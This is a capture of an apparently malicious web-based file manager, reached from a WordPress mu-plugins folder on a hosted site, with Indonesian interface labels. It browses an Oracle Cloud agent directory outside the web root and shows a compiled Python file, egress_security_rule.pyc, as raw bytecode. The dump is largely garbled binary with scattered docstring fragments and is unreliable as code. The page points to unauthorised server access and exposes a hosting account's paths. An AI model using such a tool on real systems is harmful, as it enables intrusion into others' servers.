📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
core
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/core/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: egress_security_rule.pyc
a N��fh1 � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s e Zd ZdZdZdZdd� Zedd� �Zej dd� �Zed d � �Z e j dd � �Z edd � �Zej dd � �Zedd� �Zej dd� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zdd� Zd d!� Zd"d#� Zd$S )%�EgressSecurityRulez2 A rule for allowing outbound IP packets. � CIDR_BLOCK�SERVICE_CIDR_BLOCKc K sd ddddddddd�| _ ddd d ddd dd�| _d| _d| _d| _d| _d| _d| _d| _d| _ dS )a� Initializes a new EgressSecurityRule object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param destination: The value to assign to the destination property of this EgressSecurityRule. :type destination: str :param destination_type: The value to assign to the destination_type property of this EgressSecurityRule. Allowed values for this property are: "CIDR_BLOCK", "SERVICE_CIDR_BLOCK", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type destination_type: str :param icmp_options: The value to assign to the icmp_options property of this EgressSecurityRule. :type icmp_options: oci.core.models.IcmpOptions :param is_stateless: The value to assign to the is_stateless property of this EgressSecurityRule. :type is_stateless: bool :param protocol: The value to assign to the protocol property of this EgressSecurityRule. :type protocol: str :param tcp_options: The value to assign to the tcp_options property of this EgressSecurityRule. :type tcp_options: oci.core.models.TcpOptions :param udp_options: The value to assign to the udp_options property of this EgressSecurityRule. :type udp_options: oci.core.models.UdpOptions :param description: The value to assign to the description property of this EgressSecurityRule. :type description: str �str�IcmpOptions�bool� TcpOptions� UdpOptions)�destination�destination_type�icmp_options�is_stateless�protocol�tcp_options�udp_options�descriptionr �destinationType�icmpOptions�isStatelessr � tcpOptions� udpOptionsr N) � swagger_types� attribute_map�_destination�_destination_type� _icmp_options� _is_stateless� _protocol�_tcp_options�_udp_options�_description)�self�kwargs� r'